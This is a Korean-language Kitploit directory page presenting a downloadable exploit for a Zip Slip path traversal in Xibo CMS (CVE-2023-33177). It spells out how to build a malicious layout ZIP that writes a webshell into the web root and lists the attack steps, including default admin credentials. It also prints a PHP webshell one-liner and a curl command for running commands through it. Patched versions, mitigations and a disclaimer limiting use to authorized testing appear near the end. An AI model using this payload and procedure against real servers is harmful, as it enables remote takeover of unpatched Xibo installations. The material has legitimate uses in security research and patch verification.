Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Xibo-CMS-Zip-Slip-RCE-Exploit-CVE-2023-33177 — 이 익스플로잇은 악의적인 레이아웃 임포트를 통해 원격 코드 실행을 가능하게 하는 Xibo CMS(CVE-2023-33177)의 **경로 탐색 취약점**을 시연합니다. | Kitploit
도구/GitHubGitHub/complexusprada/xibo-cms-zip-slip-rce-exploit-cve-2023-33177
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubcomplexusprada/xibo-cms-zip-slip-rce-exploit-cve-2023-33177

Xibo-CMS-Zip-Slip-RCE-Exploit-CVE-2023-33177

이 익스플로잇은 악의적인 레이아웃 임포트를 통해 원격 코드 실행을 가능하게 하는 Xibo CMS(CVE-2023-33177)의 **경로 탐색 취약점**을 시연합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
9개월 전아직 검토되지 않음

Xibo CMS Zip Slip RCE 익스플로잇 CVE-2023-33177

이 익스플로잇은 Xibo CMS(CVE-2023-33177)의 경로 탐색(Path Traversal) 취약점을 시연하며, 악성 레이아웃 가져오기를 통해 원격 코드 실행(RCE)을 가능하게 합니다.

취약점 상세

CVE/권고: CVE-2023-33177 영향받는 버전:

  • Xibo CMS 1.8.0 - 2.3.16
  • Xibo CMS 3.0.0 - 3.3.4

취약점 유형: 경로 탐색 (Zip Slip) 영향: 원격 코드 실행 (RCE)

기술 요약

Xibo CMS는 인증된 사용자가 ZIP 아카이브를 통해 레이아웃 파일을 가져올 수 있게 합니다. 가져오기 기능은 mapping.json 파일의 파일 경로를 제대로 검증하지 못하며, 이로 인해 공격자는 경로 탐색 시퀀스(../../)를 사용하여 의도된 라이브러리 디렉터리 밖에 파일을 작성할 수 있습니다.

익스플로잇 작동 방식

  1. 필요한 JSON 파일이 포함된 유효한 Xibo 레이아웃 내보내기 구조를 생성
  2. mapping.json에 경로 탐색을 주입: ../../web/shell.php를 파일 경로로 사용
  3. ZIP 구조 내 library/../../web/shell.php에 웹셸을 배치
  4. Xibo가 검증 없이 압축 해제: /var/www/cms/web/shell.php로 해석됨
  5. RCE 달성: 웹셸이 웹 루트에서 접근 가능

취약점 공격 체인

root@kitploit:~
Zip contains: library/../../web/shell.php
Xibo reads:   library/ + ../../web/shell.php (from mapping.json)
Xibo writes:  /var/www/cms/library/temp/ + ../../web/shell.php
Result:       /var/www/cms/web/shell.php ← Webshell in web root!

사용 방법

익스플로잇 생성

root@kitploit:~
python3 create_exploit.py

이 명령은 악성 레이아웃 패키지가 포함된 exploit.zip을 생성합니다.

공격 단계

  1. Xibo CMS에 접속하여 자격 증명으로 로그인(기본값: xibo_admin / password)
  2. Import로 이동: Design → Layouts → Import
  3. exploit.zip 업로드
  4. JSON 오류는 무시 - 웹셸은 이미 디스크에 기록됨
  5. 웹셸을 통해 명령 실행:
    root@kitploit:~
    curl 'http://localhost:8080/shell.php?cmd=id'
    

파일 구조

익스플로잇 ZIP에는 다음이 포함됩니다:

root@kitploit:~
exploit.zip
├── layout.json          # Valid Xibo layout definition
├── playlist.json        # Empty playlist (triggers JSON import)
├── mapping.json         # Contains path traversal payload
└── library/
    └── ../../web/
        └── shell.php    # PHP webshell (gets extracted to web root)

웹셸 기능

내장된 웹셸은 최소한의 형태입니다:

root@kitploit:~
<?php system($_GET["cmd"]); ?>

접근 방법: http://<target>/shell.php?cmd=<command>

완화 조치

패치된 버전:

  • Xibo CMS 2.3.17+로 업그레이드(2.x 브랜치)
  • Xibo CMS 3.3.5+로 업그레이드(3.x 브랜치)

완화 전략:

  1. 압축 해제 전에 ZIP 아카이브의 모든 파일 경로를 검증
  2. .. 또는 절대 경로가 포함된 경로 거부
  3. 디렉터리 탐색을 방지하는 안전한 압축 해제 방법 사용
  4. 가져오기 기능에 적절한 입력 검증 구현
  5. 파일 업로드 권한을 인증되고 승인된 사용자로만 제한

법적 및 윤리적 고지

이 익스플로잇은 다음 목적으로 제공됩니다:

  • 교육 목적
  • CTF 대회
  • 승인된 보안 테스트
  • 방어적 보안 연구

소유하지 않았거나 테스트에 대한 명시적 허가를 받지 않은 시스템에는 이 익스플로잇을 사용하지 마십시오.

참고 자료

  • 권고: GHSA-jj27-x85q-crqv
  • Xibo CMS: https://xibo.org.uk/
  • Zip Slip 취약점: https://security.snyk.io/research/zip-slip-vulnerability
  • CVE-2023-33177: https://nvd.nist.gov/vuln/detail/CVE-2023-33177

작성자

complexusprada 2025년 11월

도구 다운로드